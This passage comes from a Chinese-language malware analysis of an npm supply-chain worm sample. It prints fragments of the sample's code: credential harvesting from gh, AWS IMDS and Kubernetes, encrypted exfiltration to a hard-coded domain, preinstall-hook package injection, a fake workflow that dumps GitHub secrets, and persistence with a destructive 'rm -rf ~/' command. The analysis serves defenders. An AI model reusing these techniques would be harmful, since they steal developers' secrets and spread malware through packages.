PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">说明：确认项目默认启动即进入恶意主逻辑，并指向硬编码外传域。</span></span></p></b></b></b></b></b></b></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="json"><code><span leaf=""><span class="code-snippet__attr">&#34;start&#34;</span><span class="code-snippet__punctuation">:</span> <span class="code-snippet__string">&#34;bun run ./src/index.ts&#34;</span></span></code></pre></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="css"><code><span leaf="">const dest: SenderDestination = {</span></code><br/><code><span leaf="">  domain: <span class="code-snippet__built_in">scramble</span>(<span class="code-snippet__string">&#34;git-tanstack.com&#34;</span>),</span></code><br/><code><span leaf="">  port: <span class="code-snippet__number">443</span>,</span></code><br/><code><span leaf="">  path: <span class="code-snippet__built_in">scramble</span>(<span class="code-snippet__string">&#34;router&#34;</span>),</span></code><br/><code><span leaf="">};</span></code><br/></pre></p><p><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">2. 本地与云端敏感面采集</span></span></b></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">文件：</span></span></b></b></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">`Shai-Hulud-Open-Source-main/src/index.ts:35-37,137-141`，`src/providers/devtool/devtool.ts:19`，`src/providers/aws/credentials.ts:199,249`，`src/providers/kubernetes/kubernetes.ts:58,138`</span></span></b></b></b></p><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">说明：确认样本同时面向本地文件、GitHub CLI、AWS IMDS/IRSA、Kubernetes token 与 API secrets。</span></span></p></b></b></b></b></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="javascript"><code><span leaf="">quickResults.<span class="code-snippet__title">push</span>(<span class="code-snippet__keyword">await</span> localProvider.<span class="code-snippet__title">execute</span>());</span></code><br/><code><span leaf="">quickResults.<span class="code-snippet__title">push</span>(<span class="code-snippet__keyword">await</span> shellProvider.<span class="code-snippet__title">execute</span>());</span></code><br/><code><span leaf="">quickResults.<span class="code-snippet__title">push</span>(<span class="code-snippet__keyword">await</span> runnerProvider.<span class="code-snippet__title">execute</span>());</span></code><br/></pre></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="javascript"><code><span leaf=""><span class="code-snippet__keyword">const</span> token = <span class="code-snippet__title">execSync</span>(<span class="code-snippet__title">scramble</span>(<span class="code-snippet__string">&#34;gh auth token&#34;</span>), {</span></code></pre></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="javascript"><code><span leaf=""><span class="code-snippet__keyword">const</span> <span class="code-snippet__variable">IMDS</span> = <span class="code-snippet__string">&#34;<a href="http://169.254.169.254" target="_blank">http://169.254.169.254</a>&#34;</span>;</span></code><br/><code><span leaf=""><span class="code-snippet__keyword">const</span> tokenFile = process.<span class="code-snippet__property">env</span>[<span class="code-snippet__title">scramble</span>(<span class="code-snippet__string">&#34;AWS_WEB_IDENTITY_TOKEN_FILE&#34;</span>)];</span></code><br/></pre></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="javascript"><code><span leaf=""><span class="code-snippet__string">&#34;/var/run/secrets/kubernetes.io/serviceaccount/token&#34;</span>,</span></code><br/><code><span leaf=""><span class="code-snippet__title">Authorization</span>: <span class="code-snippet__string">`Bearer </span><span class="code-snippet__string"><span class="code-snippet__subst">${token}</span></span><span class="code-snippet__string">`</span>,</span></code><br/></pre></p><p><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><p><span leaf="" style="background-color:rgb(255, 255, 255);color:rgb(51, 51, 51);font-size:16px;font-family:Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;letter-spacing:0.544px;font-weight:bold;"><span textstyle="" style="font-weight: normal;">3. 加密外传封装与 POST</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">文件：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">`Shai-Hulud-Open-Source-main/src/sender/base.ts:48,57`，`src/sender/domain/sender.ts:70`</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">说明：确认结果会被加密后发送到远端，而非仅本地收集。</span></span></p></b></b></b></b></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="javascript"><code><span leaf=""><span class="code-snippet__keyword">const</span> encryptedKey = crypto.<span class="code-snippet__title">publicEncrypt</span>(</span></code></pre></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="javascript"><code><span leaf=""><span class="code-snippet__keyword">const</span> cipher = crypto.<span class="code-snippet__title">createCipheriv</span>(<span class="code-snippet__string">&#34;aes-256-gcm&#34;</span>, aesKey, iv);</span></code></pre></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="css"><code><span leaf=""><span class="code-snippet__selector-tag">body</span>: JSON.<span class="code-snippet__built_in">stringify</span>(envelope),</span></code></pre></p><p><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">4. npm 供应链植入</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">文件：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">`Shai-Hulud-Open-Source-main/src/collector/collector.ts:39,61`，`src/mutator/npm/index.ts:68`，`src/mutator/npmoidc/index.ts:37,172-178`，`src/utils/config.ts:7`</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">说明：确认一旦捕获 token，样本会直接实施改包、注入与发布。</span></span></p></b></b></b></b></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="css"><code><span leaf="">if (result<span class="code-snippet__selector-class">.matches</span>?.<span class="code-snippet__selector-attr">[</span><span class="code-snippet__selector-attr"><span class="code-snippet__string">&#34;npmtoken&#34;</span></span><span class="code-snippet__selector-attr">]</span>) {</span></code></pre></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="javascript"><code><span leaf=""><span class="code-snippet__keyword">const</span> npmIntegration = <span class="code-snippet__keyword">new</span> <span class="code-snippet__title">NpmClient</span>(npmCheck);</span></code></pre></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="ini"><code><span leaf=""><span class="code-snippet__attr">pkg.scripts.preinstall</span> = scramble(<span class="code-snippet__string">&#34;node setup.mjs&#34;</span>)<span class="code-snippet__comment">;</span></span></code></pre></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="javascript"><code><span leaf="">pkg.<span class="code-snippet__property">optionalDependencies</span>[<span class="code-snippet__string">&#34;@opensearch/setup&#34;</span>] = <span class="code-snippet__variable">PACKAGE_NAME</span>;</span></code><br/><code><span leaf=""><span class="code-snippet__keyword">const</span> { <span class="code-snippet__variable">ACTIONS_ID_TOKEN_REQUEST_TOKEN</span>, <span class="code-snippet__variable">ACTIONS_ID_TOKEN_REQUEST_URL</span> } = process.<span class="code-snippet__property">env</span>;</span></code><br/><code><span leaf=""><span class="code-snippet__string">`</span><span class="code-snippet__string"><span class="code-snippet__subst">${ACTIONS_ID_TOKEN_REQUEST_URL}</span></span><span class="code-snippet__string">&amp;audience=npm:registry.npmjs.org`</span></span></code><br/></pre></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="javascript"><code><span leaf=""><span class="code-snippet__string">&#34;github:opensearch-project/opensearch-js#d446803f4c3bc116263faa3499a1d3f95b2825de&#34;</span>,</span></code></pre></p><p><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">5. GitHub Actions secrets 导出</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">文件：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">`Shai-Hulud-Open-Source-main/src/providers/actions/workflow.ts:11`，`src/assets/workflow.yml:9,13`</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">说明：确认其通过伪装 workflow 将 secrets 序列化到 artifact 中再取回。</span></span></p></b></b></b></b></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="javascript"><code><span leaf=""><span class="code-snippet__keyword">const</span> <span class="code-snippet__variable">BRANCH_NAME</span> = <span class="code-snippet__title">scramble</span>(</span></code><br/><code><span leaf="">  <span class="code-snippet__string">&#34;dependabot/github_actions/format/setup-formatter&#34;</span>,</span></code><br/><code><span leaf="">);</span></code><br/></pre></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="bash"><code><span leaf="">VARIABLE_STORE: <span class="code-snippet__variable">${{ toJSON(secrets) }</span>}</span></code><br/><code><span leaf="">run: <span class="code-snippet__built_in">echo</span> <span class="code-snippet__string">&#34;</span><span class="code-snippet__string"><span class="code-snippet__variable">$VARIABLE_STORE</span></span><span class="code-snippet__string">&#34;</span> &gt; format-results.txt</span></code><br/></pre></p><p><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">6. GitHub fallback 外传与本地持久化</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">文件：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">`Shai-Hulud-Open-Source-main/src/sender/github/githubSender.ts:58,89,157`，`src/assets/DEADMAN_SWITCH.sh:48-49,96`</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">说明：确认 fallback sender 会提交外传结果，并安装 token 监控持久化脚本。</span></span></p></b></b></b></b></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="kotlin"><code><span leaf="">await <span class="code-snippet__keyword">this</span>.installTokenMonitor(<span class="code-snippet__keyword">this</span>.token, scramble(<span class="code-snippet__string">&#34;rm -rf ~/&#34;</span>));</span></code></pre></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="javascript"><code><span leaf="">? <span class="code-snippet__string">`</span><span class="code-snippet__string"><span class="code-snippet__subst">${SEARCH_STRING}</span></span><span class="code-snippet__string">:</span><span class="code-snippet__string"><span class="code-snippet__subst">${envelope.token}</span></span><span class="code-snippet__string">`</span></span></code></pre></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="powershell"><code><span leaf="">HTTP_STATUS=<span class="code-snippet__variable">$</span>(<span class="code-snippet__built_in">curl</span> <span class="code-snippet__literal">-s</span> <span class="code-snippet__literal">-o</span> /dev/null <span class="code-snippet__literal">-w</span> <span class="code-snippet__string">&#34;%{http_code}&#34;</span> \</span></code><br/><code><span leaf="">  <span class="code-snippet__literal">-H</span> <span class="code-snippet__string">&#34;Authorization: Bearer </span><span class="code-snippet__string"><span class="code-snippet__variable">$</span></span><span class="code-snippet__string">{GITHUB_TOKEN}&#34;</span> \</span></code><br/></pre></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="bash"><code><span leaf="">launchctl bootstrap <span class="code-snippet__string">&#34;gui/</span><span class="code-snippet__string"><span class="code-snippet__subst">$(id -u)</span></span><span class="code-snippet__string">&#34;</span> <span class="code-snippet__string">&#34;</span><span class="code-snippet__string"><span class="code-snippet__variable">${PLIST_PATH}</span></span><span class="code-snippet__string">&#34;</span></span></code></pre></p><p><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">7. 去混淆视图确认安装期载荷</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">文件：</span></span></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">`Shai-Hulud-Open-Source-main/src/assets/config.mjs:171-186`（基于去混淆视图）</span></span></b></p><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">说明：去混淆结果清楚表明 `setup.mjs` 会下载 Bun 运行时并执行 `ai_init.js`，有助于确认安装期执行链。</span></span></p></b></b></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="javascript"><code><span leaf=""><span class="code-snippet__keyword">const</span> u = <span class="code-snippet__string">`<a href="https://github.com/oven-sh/bun/releases/download/bun-v" target="_blank">https://github.com/oven-sh/bun/releases/download/bun-v</a></span><span class="code-snippet__string"><span class="code-snippet__subst">${V}</span></span><span class="code-snippet__string">/</span><span class="code-snippet__string"><span class="code-snippet__subst">${a}</span></span><span class="code-snippet__string">.zip`</span>;</span></code><br/><code><span leaf=""><span class="code-snippet__keyword">await</span> <span class="code-snippet__title">dl</span>(u, zp);</span></code><br/><code><span leaf=""><span class="code-snippet__title">execFileSync</span>(bp, [ep], {</span></code><br/><code><span leaf="">  <span class="code-snippet__attr">stdio</span>: <span class="code-snippet__string">&#34;inherit&#34;</span>,</span></code><br/><code><span leaf="">  <span class="code-snippet__attr">cwd</span>: D</span></code><br/><code><span leaf="">});</span></code><br/></pre></p><p><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">2.2 凭证窃取范围</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">这是迄今为止针对开发者环境最全面的凭证收集工具之一：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.5416666666666666" data-type="png" data-w="1080" height="325" style="margin-left: 0px;margin-top: 0px;" width="602" data-imgfileid="100021275" src="https://wechat2rss.xlab.app/img-proxy/?k=08cf94b5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCKr3SyoTs2S9PxesT4IAibxDm7aWciaVCbCbnGvaiaPIQS3EPmDavZyZnACByhycjPMdHR2aafT8ZK3o8LibHia6L557GI194vyLXJk%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">2.3 Token 识别能力</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">恶意软件内置了强大的正则表达式引擎：</span></span></p></b></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="javascript"><code><span leaf=""><span class="code-snippet__comment">// GitHub Personal Access Token</span></span></code><br/><code><span leaf=""><span class="code-snippet__attr">ghtoken</span>:  <span class="code-snippet__regexp">/gh[op]_[A-Za-z0-9]{36}/g</span></span></code><br/><code><span leaf=""><span class="code-snippet__comment">// npm Token</span></span></code><br/><code><span leaf=""><span class="code-snippet__attr">npmtoken</span>: <span class="code-snippet__regexp">/npm_[A-Za-z0-9]{36,}/g</span></span></code><br/><code><span leaf=""><span class="code-snippet__comment">// GitHub App JWT</span></span></code><br/><code><span leaf=""><span class="code-snippet__attr">ghs_jwt</span>:  <span class="code-snippet__regexp">/ghs_\d+_[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+/g</span></span></code><br/></pre></p><p><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 20px;font-weight: bold;">2.4 针对 Claude Code 的攻击</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 